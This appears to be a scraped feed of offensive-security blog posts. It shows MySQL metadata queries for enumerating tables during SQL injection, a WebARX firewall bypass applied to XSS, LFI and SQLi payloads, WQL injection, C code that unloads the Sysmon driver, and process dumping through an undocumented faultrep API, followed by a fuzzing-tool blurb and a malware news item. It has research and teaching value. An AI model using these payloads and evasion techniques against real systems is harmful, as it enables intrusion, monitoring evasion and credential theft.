These views were added in MySQL 5.7.9.

mysql> SELECT object_name FROM `sys`.`x$innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| flag        |
| referers    |
| uagents     |
| users       |
+-------------+
5 rows in set (0.04 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$schema_flattened_keys` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.01 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$ps_schema_table_statistics_io` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| db         |
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
6 rows in set (0.04 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$schema_index_statistics` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| table_name |
+------------+
| users      |
| emails     |
| referers   |
| uagents    |
| flag       |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| users      |
| flag       |
| referers   |
| uagents    |
+------------+
5 rows in set (0.03 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics_with_buffer` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| referers   |
| uagents    |
| emails     |
| users      |
| flag       |
+------------+
5 rows in set (0.07 sec)

mysql> SELECT object_name FROM `sys`.`innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| flag        |
| referers    |
| uagents     |
| users       |
+-------------+
5 rows in set (0.05 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`schema_auto_increment_columns` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| table_name |
+------------+
| referers   |
| flag       |
| emails     |
| users      |
| uagents    |
+------------+
5 rows in set (0.14 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`schema_index_statistics` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| table_name |
+------------+
| users      |
| emails     |
| referers   |
| uagents    |
| flag       |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`schema_table_statistics` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| users      |
| emails     |
| referers   |
| uagents    |
| flag       |
+------------+
5 rows in set (0.04 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`schema_table_statistics_with_buffer` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| users      |
| emails     |
| flag       |
| referers   |
| uagents    |
+------------+
5 rows in set (0.09 sec)

Using these queries, you can get the table file paths stored locally on disk; the table names can be extracted from those paths.

mysql> SELECT FILE FROM `sys`.`io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
+---------------------------------+
| file                            |
+---------------------------------+
| @@datadir\security\emails.ibd   |
| @@datadir\security\flag.ibd     |
| @@datadir\security\referers.ibd |
| @@datadir\security\uagents.ibd  |
| @@datadir\security\users.ibd    |
| @@datadir\security\uagents.frm  |
| @@datadir\security\referers.frm |
| @@datadir\security\users.frm    |
| @@datadir\security\emails.frm   |
| @@datadir\security\flag.frm     |
| @@datadir\security\db.opt       |
+---------------------------------+
11 rows in set (0.22 sec)

mysql> SELECT FILE FROM `sys`.`io_global_by_file_by_latency` WHERE FILE REGEXP DATABASE();
+---------------------------------+
| file                            |
+---------------------------------+
| @@datadir\security\flag.ibd     |
| @@datadir\security\uagents.ibd  |
| @@datadir\security\flag.frm     |
| @@datadir\security\emails.frm   |
| @@datadir\security\emails.ibd   |
| @@datadir\security\referers.ibd |
| @@datadir\security\referers.frm |
| @@datadir\security\users.frm    |
| @@datadir\security\users.ibd    |
| @@datadir\security\uagents.frm  |
| @@datadir\security\db.opt       |
+---------------------------------+

mysql> SELECT FILE FROM `sys`.`x$io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
+-----------------------------------------------------------------------------+
| file                                                                        |
+-----------------------------------------------------------------------------+
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.ibd   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.ibd     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.ibd |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.ibd  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.ibd    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.frm  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.frm |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.frm    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.frm   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.frm     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\db.opt       |
+-----------------------------------------------------------------------------+

mysql> SELECT FILE FROM `sys`.`x$io_global_by_file_by_latency` WHERE FILE REGEXP DATABASE();
+-----------------------------------------------------------------------------+
| file                                                                        |
+-----------------------------------------------------------------------------+
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.ibd     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.ibd  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.frm     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.frm   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.ibd   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.ibd |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.frm |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.frm    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.ibd    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.frm  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\db.opt       |
+-----------------------------------------------------------------------------+
11 rows in set (0.00 sec)

The following views store previously executed queries, like a log. You can use regular expressions to find what you need.

mysql> SELECT QUERY FROM sys.x$statement_analysis WHERE QUERY REGEXP DATABASE();
+-----------------------------------------------------------------------------------------------------------------------------------+
| query                                                                                                                             |
+-----------------------------------------------------------------------------------------------------------------------------------+
| SHOW TABLE STATUS FROM `security`                                                                                                 |
| SHOW CREATE TABLE `security` . `emails`                                                                                           |
| SHOW CREATE TABLE `security` . `users`                                                                                            |
| SHOW CREATE TABLE `security` . `referers`                                                                                         |
+-----------------------------------------------------------------------------------------------------------------------------------+

mysql> SELECT QUERY FROM `sys`.`statement_analysis` where QUERY REGEXP DATABASE();
+-----------------------------------------------------------+
| query                                                     |
+-----------------------------------------------------------+
| SHOW TABLE STATUS FROM `security`                         |
| SHOW CREATE TABLE `security` . `emails`                   |
| SHOW CREATE TABLE `security` . `users`                    |
| SHOW CREATE TABLE `security` . `referers`                 |
| SELECT * FROM `security` . `users` LIMIT ?                |
| SHOW CREATE TABLE `security` . `uagents`                  |
| SHOW CREATE PROCEDURE `security` . `select_first_column`  |
| SHOW CREATE TABLE `security` . `users`                    |
| SHOW OPEN TABLES FROM `security` WHERE `in_use` != ?      |
| SHOW TRIGGERS FROM `security`                             |
| USE `security`                                            |
| USE `security`                                            |
+-----------------------------------------------------------+
12 rows in set (0.01 sec)

Performance_Schema

mysql> SELECT object_name FROM `performance_schema`.`objects_summary_global_by_type` WHERE object_schema = DATABASE();
+---------------------+
| object_name         |
+---------------------+
| emails              |
| referers            |
| uagents             |
| users               |
| flag                |
| select_first_column |
+---------------------+
6 rows in set (0.00 sec)

mysql> SELECT object_name FROM `performance_schema`.`table_handles` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| referers    |
| uagents     |
| users       |
| users       |
| users       |
| users       |
| users       |
| users       |
| users       |
| emails      |
| flag        |
| referers    |
| uagents     |
| users       |
| emails      |
| flag        |
| referers    |
| uagents     |
| users       |
+-------------+
20 rows in set (0.00 sec)

mysql> SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_index_usage` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| referers    |
| uagents     |
| users       |
| users       |
| flag        |
+-------------+
6 rows in set (0.00 sec)

mysql> SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_table` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| referers    |
| uagents     |
| users       |
| flag        |
+-------------+
5 rows in set (0.00 sec)

mysql> SELECT object_name FROM `performance_schema`.`table_lock_waits_summary_by_table` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| referers    |
| uagents     |
| users       |
| flag        |
+-------------+
5 rows in set (0.00 sec)

As mentioned before, the following contains the log of all typed SQL queries, where you might sometimes find table names. For simplicity, I have used a regular expression to match the current database name.

mysql> SELECT digest_text FROM `performance_schema`.`events_statements_summary_by_digest` WHERE digest_text REGEXP DATABASE();
+-----------------------------------------------------------------------------------------------------------------------------------+
| digest_text                                                                                                                       |
+-----------------------------------------------------------------------------------------------------------------------------------+
| SHOW CREATE TABLE `security` . `emails`                                                                                           |
| SHOW CREATE TABLE `security` . `referers`                                                                                         |
| SHOW CREATE PROCEDURE `security` . `select_first_column`                                                                          |
| SHOW CREATE TABLE `security` . `uagents`                                                                                          |
+-----------------------------------------------------------------------------------------------------------------------------------+
17 rows in set (0.00 sec)

As before, we are fetching the local table file paths.

mysql> SELECT file_name FROM `performance_schema`.`file_instances` WHERE file_name REGEXP DATABASE();
+-----------------------------------------------------------------------------+
| file_name                                                                   |
+-----------------------------------------------------------------------------+
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.ibd   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.ibd     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.ibd |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.ibd  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.ibd    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.frm   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.frm |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\db.opt       |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.frm  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.frm    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.frm     |
+-----------------------------------------------------------------------------+
11 rows in set (0.00 sec)

mysql> SELECT file_name FROM `performance_schema`.`file_summary_by_instance` WHERE file_name REGEXP DATABASE();
+-----------------------------------------------------------------------------+
| file_name                                                                   |
+-----------------------------------------------------------------------------+
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.ibd   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.ibd     |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.ibd |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.ibd  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.ibd    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\emails.frm   |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\referers.frm |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\db.opt       |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\uagents.frm  |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\users.frm    |
| D:\MySQL\mysql-5.7.29-winx64\mysql-5.7.29-winx64\data\security\flag.frm     |
+-----------------------------------------------------------------------------+
11 rows in set (0.00 sec)

MySQL

mysql> SELECT table_name FROM `mysql`.`innodb_table_stats` WHERE database_name = DATABASE();
+------------+
| table_name |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT table_name FROM `mysql`.`innodb_index_stats` WHERE database_name = DATABASE();
+------------+
| table_name |
+------------+
| emails     |
| emails     |
| emails     |
| flag       |
| flag       |
| flag       |
| referers   |
| referers   |
| referers   |
| uagents    |
| uagents    |
| uagents    |
| users      |
| users      |
| users      |
+------------+
15 rows in set (0.00 sec)

Information_Schema

mysql> SELECT TABLE_NAME FROM `information_schema`.`KEY_COLUMN_USAGE` WHERE CONSTRAINT_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.07 sec)

mysql> SELECT TABLE_NAME FROM `information_schema`.`KEY_COLUMN_USAGE` WHERE table_schema = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.00 sec)

In addition, the name of the first column (typically the primary key) can be retrieved in this case.

mysql> SELECT COLUMN_NAME FROM `information_schema`.`KEY_COLUMN_USAGE` WHERE table_schema = DATABASE();
+-------------+
| COLUMN_NAME |
+-------------+
| id          |
| id          |
| id          |
| id          |
| id          |
+-------------+
5 rows in set (0.00 sec)

mysql> SELECT TABLE_NAME FROM `information_schema`.`PARTITIONS` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.01 sec)

In this table, you can also use the column ‘column_name’ to get the first column of all tables.

mysql> SELECT TABLE_NAME FROM `information_schema`.`STATISTICS` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT TABLE_NAME FROM `information_schema`.`TABLE_CONSTRAINTS` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT file_name FROM `information_schema`.`FILES` where file_name regexp database();
+-------------------------+
| file_name               |
+-------------------------+
| .\security\emails.ibd   |
| .\security\flag.ibd     |
| .\security\referers.ibd |
| .\security\uagents.ibd  |
| .\security\users.ibd    |
+-------------------------+
5 rows in set (0.00 sec)

Starting from MySQL 5.6, the InnoDB system tables are exposed in Information_Schema.

mysql> SELECT TABLE_NAME FROM `information_schema`.`INNODB_BUFFER_PAGE` WHERE TABLE_NAME REGEXP  DATABASE();
+-----------------------+
| TABLE_NAME            |
+-----------------------+
| `security`.`emails`   |
| `security`.`referers` |
| `security`.`uagents`  |
| `security`.`users`    |
| `security`.`flag`     |
+-----------------------+

mysql> SELECT TABLE_NAME FROM `information_schema`.`INNODB_BUFFER_PAGE_LRU` WHERE TABLE_NAME REGEXP DATABASE();
+-----------------------+
| TABLE_NAME            |
+-----------------------+
| `security`.`emails`   |
| `security`.`referers` |
| `security`.`uagents`  |
| `security`.`users`    |
| `security`.`flag`     |
+-----------------------+
5 rows in set (0.06 sec)

mysql> SELECT path FROM  `information_schema`.`INNODB_SYS_DATAFILES` WHERE path REGEXP DATABASE();
+-------------------------+
| path                    |
+-------------------------+
| .\security\users.ibd    |
| .\security\emails.ibd   |
| .\security\uagents.ibd  |
| .\security\referers.ibd |
| .\security\flag.ibd     |
+-------------------------+
5 rows in set (0.00 sec)

mysql> SELECT NAME FROM `information_schema`.`INNODB_SYS_TABLESPACES` WHERE NAME REGEXP DATABASE();
+-------------------+
| NAME              |
+-------------------+
| security/users    |
| security/emails   |
| security/uagents  |
| security/referers |
| security/flag     |
+-------------------+
5 rows in set (0.04 sec)

mysql> SELECT NAME FROM `information_schema`.`INNODB_SYS_TABLESTATS` WHERE NAME REGEXP DATABASE();
+-------------------+
| NAME              |
+-------------------+
| security/emails   |
| security/flag     |
| security/referers |
| security/uagents  |
| security/users    |
+-------------------+
5 rows in set (0.00 sec)

Column Names

People often ask me whether there is any method to extract column names. In most cases you don't really need to know the column names at all.

If errors are displayed, you can get the number of columns straight away with the first query below: comparing the table's row to a single value makes MySQL return the column count in the error. To determine the number of columns in a boolean blind injection scenario, the second trick works because the comparison stops erroring and simply returns 0 once the counts match (since the values aren't equal). After that, the third query extracts data without naming any column 🙂
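Since the original queries were screenshots, here is an illustrative sketch of the idea. It assumes the three-column users table (id, username, password) from the security database used above; the exact payloads may differ from the original post.

-- 1) Error based: comparing the whole row to a single value makes MySQL
--    leak the column count in the operand error
SELECT * FROM users WHERE id = 1 AND (SELECT * FROM users) = (1);
-- ERROR 1241 (21000): Operand should contain 3 column(s)

-- 2) Boolean blind: once the guessed column count is right, the row
--    comparison stops erroring and simply evaluates to 0 (values differ)
SELECT (1,2,3) = (SELECT * FROM users LIMIT 1);

-- 3) Data extraction without column names: the UNION names the derived
--    table's columns `1`, `2`, `3`, which can then be selected directly
SELECT `2` FROM (SELECT 1,2,3 UNION SELECT * FROM users)x;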

I hope these come in handy in your next pentest 🙂

Bypassing the WebARX Web Application Firewall (WAF)

12 October 2019 at 22:16

WebARX is a web application firewall that protects websites from malicious attacks. It was covered by The Hacker News and has good ratings if you do some Googling.
https://thehackernews.com/2019/09/webarx-web-application-security.html

It turns out that the WebARX WAF can be easily bypassed by passing a whitelist string: if the WAF detects a whitelist string in the request, the request is not inspected at all.

Let's first try it on their own website with a simple LFi payload.



Now if I include a whitelist string such as ithemes-sync-request, the request goes straight through.
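For example, if the vulnerable parameter were something like the following (the host and parameter name are made up for illustration; only the ithemes-sync-request whitelist string comes from the actual bypass):

https://victim.example/index.php?page=../../../../etc/passwd                          <- blocked
https://victim.example/index.php?page=../../../../etc/passwd&ithemes-sync-request=1   <- allowed through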

XSS PoC

Here's an XSS PoC where we pass a simple script tag. The WAF detects the raw request when we send it normally.

But if we include the ithemes-sync-request parameter, which is a whitelist string, the script tag gets executed.

LFi PoC

Here's a normal payload, which gets blocked.

Once we apply the whitelist string it’s bypassed.

SQLi PoC

Here's a normal payload, which gets blocked.

Once we apply the whitelist string it’s bypassed.

These whitelist strings are more like a kill switch for this firewall. I'm not quite sure the developers of this project understand the logic behind it. It looks more like something coded by an amateur programmer for a university assignment.

[tweet https://twitter.com/webarx_security/status/1181655018442760193]

WQL Injection

6 October 2019 at 21:59

Generally in application security, user input must be sanitized. When it comes to SQL injection, the root cause is most often input that is not sanitized properly. I was curious about the Windows Management Instrumentation Query Language (WQL), which is the SQL of WMI: can we abuse WQL if the input is not sanitized?

I wrote a simple application in C++ which gets the service information from the Win32_Service class. It will display members such as Name, ProcessId, PathName, Description, etc.

This is the WQL Query.

SELECT * FROM win32_service where Name='User Input'

As you can see, I am using the IWbemServices::ExecQuery method to execute the query and enumerating the results using the IEnumWbemClassObject::Next method.

BSTR input = L"SELECT * FROM win32_service where Name='User Input'";

if (FAILED(hRes = pService->ExecQuery(L"WQL", input, WBEM_FLAG_FORWARD_ONLY, NULL, &pEnumerator))) {
	pLocator->Release();
	pService->Release();
	cout << "Unable to retrieve Services: 0x" << std::hex << hRes << endl;
	return 1;
}

IWbemClassObject* clsObj = NULL;
int numElems;
while ((hRes = pEnumerator->Next(WBEM_INFINITE, 1, &clsObj, (ULONG*)&numElems)) != WBEM_S_FALSE) {
	if (FAILED(hRes)) break;
	VARIANT vRet;
	VariantInit(&vRet);
	// Read the Name property of the current Win32_Service instance
	if (SUCCEEDED(clsObj->Get(L"Name", 0, &vRet, NULL, NULL))
		&& vRet.vt == VT_BSTR) {
		wcout << L"Name: " << vRet.bstrVal << endl;
		VariantClear(&vRet);
	}
	clsObj->Release();
}

Once the user enters a service name the application will display its members.

I was wondering whether it is possible to make the query true and return all the services of the target host, something like id=1 or 1=1 in SQLi, where we make the statement logically true.
Since the user input is not properly sanitized in this case, we can use the or keyword and enumerate all the services with the like keyword.

SELECT * FROM win32_service where Name='Appinfo' or name like '[^]%'

You could simply use “%” as well.
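Assuming the input lands directly in the query template above (the closing quote is supplied by the template itself), the raw service-name input for that query would look like:

Appinfo' or name like '[^]%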

This is just a simple demonstration to prove WQL injection; I'm sure there are better cases to demonstrate it. However, Extended WQL, a superset of WQL used by System Center Configuration Manager (SCCM), can combine statements and do more interesting things. Always sanitize your application's input.

You can download the applications from here to play around.
https://github.com/OsandaMalith/WMI/releases/download/1/WinServiceInfo.7z

Unloading the Sysmon Minifilter Driver

22 September 2019 at 14:51

The binary fltMC.exe is used to manage minifilter drivers. You can easily load and unload minifilters using this binary. To unload the Sysmon driver you can use:

fltMC unload SysmonDrv

If this binary is flagged, we can unload the minifilter driver by calling ‘FilterUnload’, which is the Win32 equivalent of ‘FltUnloadFilter’. It will invoke the minifilter’s ‘FilterUnloadCallback’ (PFLT_FILTER_UNLOAD_CALLBACK) routine. This is the same as using fltMC, i.e. a non-mandatory unload.
Calling this API requires SeLoadDriverPrivilege, and obtaining that privilege requires administrative permissions.

Here's some simple C code I wrote to call the ‘FilterUnload’ API.

https://github.com/OsandaMalith/WindowsInternals/blob/master/Unload_Minifilter.c

[gist https://gist.github.com/OsandaMalith/3315bc640ff51227ab067052bc20a445]
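The gist is not rendered in this feed, so here is a rough sketch of the same idea rather than the author's exact code: enable SeLoadDriverPrivilege on the current process token and then call FilterUnload on the Sysmon minifilter.

#include <windows.h>
#include <fltuser.h>
#include <stdio.h>

#pragma comment(lib, "fltlib.lib")
#pragma comment(lib, "advapi32.lib")

// Enable a privilege (here SeLoadDriverPrivilege) in the current process token
static BOOL EnablePrivilege(LPCWSTR privName) {
	HANDLE hToken;
	TOKEN_PRIVILEGES tp = { 0 };

	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
		return FALSE;

	tp.PrivilegeCount = 1;
	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	if (!LookupPrivilegeValueW(NULL, privName, &tp.Privileges[0].Luid)) {
		CloseHandle(hToken);
		return FALSE;
	}

	BOOL ok = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL)
		&& GetLastError() == ERROR_SUCCESS;
	CloseHandle(hToken);
	return ok;
}

int wmain(void) {
	if (!EnablePrivilege(L"SeLoadDriverPrivilege")) {
		wprintf(L"Could not enable SeLoadDriverPrivilege (run elevated)\n");
		return 1;
	}

	// Non-mandatory unload: the minifilter's unload callback can still refuse it
	HRESULT hr = FilterUnload(L"SysmonDrv");
	if (FAILED(hr)) {
		wprintf(L"FilterUnload failed: 0x%08lx\n", (unsigned long)hr);
		return 1;
	}

	wprintf(L"SysmonDrv unloaded\n");
	return 0;
}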

Note that when a minifilter driver is unloaded via the Filter Manager, the event is logged in the System log.

References:
https://www.osr.com/nt-insider/2017-issue2/introduction-standard-isolation-minifilters/

MiniDumpWriteDump via Faultrep!CreateMinidump

8 September 2019 at 21:18

I found this old undocumented API “CreateMinidumpW” inside faultrep.dll on Windows XP and Windows Server 2003. It ends up calling dbghelp!MiniDumpWriteDump to dump the process, loading dbghelp.dll dynamically at runtime.

The function takes 3 arguments. I really have no clue what the 3rd argument's structure is. I passed 0 as the pointer to the structure, so by default we end up with 0x21 as the MINIDUMP_TYPE.

CreateMinidumpW(DWORD dwProcessId, LPCWSTR lpFileName, struct tagSMDumpOptions *)



This is the call stack

dbghelp.dll!MiniDumpWriteDump
faultrep.dll!InternalGenerateMinidumpEx(void *,unsigned long,void *,struct tagSMDumpOptions *,unsigned short const *,int)	
faultrep.dll!InternalGenerateMinidump(void *,unsigned long,unsigned short const *,struct tagSMDumpOptions *,int)	
faultrep.dll!CreateMinidumpW(unsigned long,unsigned short const *,struct tagSMDumpOptions *)

As you see it calls the dbghelp!MiniDumpWriteDump by loading the dbghelp.dll using the LoadLibraryExW API.

However, ‘faultrep.dll!InternalGenerateMinidumpEx’ doesn't produce a full dump. As you can see, it either passes 0x21, or it checks a value in the structure passed as the 3rd argument and passes 0x325 instead.

0x21 = MiniDumpWithDataSegs | MiniDumpWithUnloadedModules	

0x325 = MiniDumpWithDataSegs | MiniDumpWithHandleData | MiniDumpWithPrivateReadWriteMemory | MiniDumpWithProcessThreadData | MiniDumpWithUnloadedModules

What you could do is patch that value to 0x2 to make it a ‘MiniDumpWithFullMemory’. You can find the 64-bit version of the patched DLL here: https://github.com/OsandaMalith/WindowsInternals/tree/master/CreateMinidump

This is the PoC of calling this API. You can copy the DLL from Windows XP and it will work fine. Not sure how useful this is; just sharing what I found 🙂

[gist https://gist.github.com/OsandaMalith/087947635eb47a5d92c1d0b1df0414eb]
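Since the gist is not rendered here, this is a rough sketch of what such a PoC looks like: faultrep.dll (copied from XP or Server 2003) is loaded at runtime and the undocumented export is resolved with GetProcAddress. The BOOL return type and the WINAPI calling convention are assumptions, and NULL is passed for the unknown tagSMDumpOptions pointer.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

// Assumed signature of the undocumented export (return type and calling convention guessed)
typedef BOOL (WINAPI *CreateMinidumpW_t)(DWORD dwProcessId, LPCWSTR lpFileName, void *pDumpOptions);

int wmain(int argc, wchar_t **argv) {
	if (argc != 3) {
		wprintf(L"Usage: %ls <pid> <dump file>\n", argv[0]);
		return 1;
	}

	// faultrep.dll copied from Windows XP / Server 2003 into the current directory
	HMODULE hFaultrep = LoadLibraryW(L"faultrep.dll");
	if (!hFaultrep) {
		wprintf(L"Could not load faultrep.dll\n");
		return 1;
	}

	CreateMinidumpW_t pCreateMinidumpW =
		(CreateMinidumpW_t)GetProcAddress(hFaultrep, "CreateMinidumpW");
	if (!pCreateMinidumpW) {
		wprintf(L"CreateMinidumpW export not found\n");
		FreeLibrary(hFaultrep);
		return 1;
	}

	// NULL for the undocumented tagSMDumpOptions pointer -> MINIDUMP_TYPE 0x21
	if (pCreateMinidumpW((DWORD)_wtoi(argv[1]), argv[2], NULL))
		wprintf(L"Dump written to %ls\n", argv[2]);
	else
		wprintf(L"CreateMinidumpW failed\n");

	FreeLibrary(hFaultrep);
	return 0;
}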

UPDATE: I wrote a hot patch for both the 32-bit and 64-bit faultrep DLLs. It allows you to get a full process dump by passing MiniDumpWithFullMemory as the MINIDUMP_TYPE. Tested on Windows XP 32-bit and 64-bit. On other systems, copying the original DLLs into the same folder will work fine. You can find the repo with the DLL files here: https://github.com/OsandaMalith/WindowsInternals/tree/master/CreateMinidump/Hot%20Patch

[gist https://gist.github.com/OsandaMalith/a39f22e99e0b21ccd68d1c4702346d5e]

Some uses 😉
[tweet https://twitter.com/m3g9tr0n/status/1171462911388028931]

ClusterFuzzLite - Simple Continuous Fuzzing That Runs In CI

3 December 2021 at 11:30
By: Zion3R


ClusterFuzzLite is a continuous fuzzing solution that runs as part of Continuous Integration (CI) workflows to find vulnerabilities faster than ever before. With just a few lines of code, GitHub users can integrate ClusterFuzzLite into their workflow and fuzz pull requests to catch bugs before they are committed.

ClusterFuzzLite is based on ClusterFuzz.
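Under the hood these tools run coverage-guided fuzz targets. As a minimal sketch, a libFuzzer-style target in C (the parse_header function here is a made-up example, not part of ClusterFuzzLite) looks like this:

#include <stdint.h>
#include <stddef.h>

// Toy function under test: crashes on one specific 4-byte header (for illustration only)
static void parse_header(const uint8_t *data, size_t size) {
	if (size >= 4 && data[0] == 'F' && data[1] == 'U' && data[2] == 'Z' && data[3] == 'Z') {
		volatile int *p = 0;
		*p = 1;  // deliberate crash for the fuzzer to find
	}
}

// Entry point the libFuzzer engine calls with each generated input
int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
	parse_header(data, size);
	return 0;
}

ClusterFuzzLite builds such targets in CI and runs them against the code in each pull request.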


Features

  • Quick code change (pull request) fuzzing to find bugs before they land
  • Downloads of crashing testcases
  • Continuous longer running fuzzing (batch fuzzing) to asynchronously find deeper bugs missed during code change fuzzing and build a corpus for use in code change fuzzing
  • Coverage reports showing which parts of your code are fuzzed
  • Modular functionality, so you can decide which features you want to use


Supported Languages

  • C
  • C++
  • Java (and other JVM-based languages)
  • Go
  • Python
  • Rust
  • Swift

Supported CI Systems

  • GitHub Actions
  • Google Cloud Build
  • Prow
  • Support for more CI systems is in progress, and extending support to other CI systems is easy

Documentation

Read our detailed documentation to learn how to use ClusterFuzzLite.

Staying in touch

Join our mailing list for announcements and discussions.

If you use ClusterFuzzLite, please fill out this form so we know who is using it. This gives us an idea of the impact of ClusterFuzzLite and allows us to justify future work.

Feel free to file an issue if you experience any trouble or have feature requests.



New Malvertising Campaigns Spreading Backdoors, Malicious Chrome Extensions

3 December 2021 at 10:59
A series of malicious campaigns have been leveraging fake installers of popular apps and games such as Viber, WeChat, NoxPlayer, and Battlefield as a lure to trick users into downloading a new backdoor and an undocumented malicious Google Chrome extension, with the goal of stealing credentials and data stored on the compromised systems as well as maintaining persistent remote access. (Source: Cisco Talos)

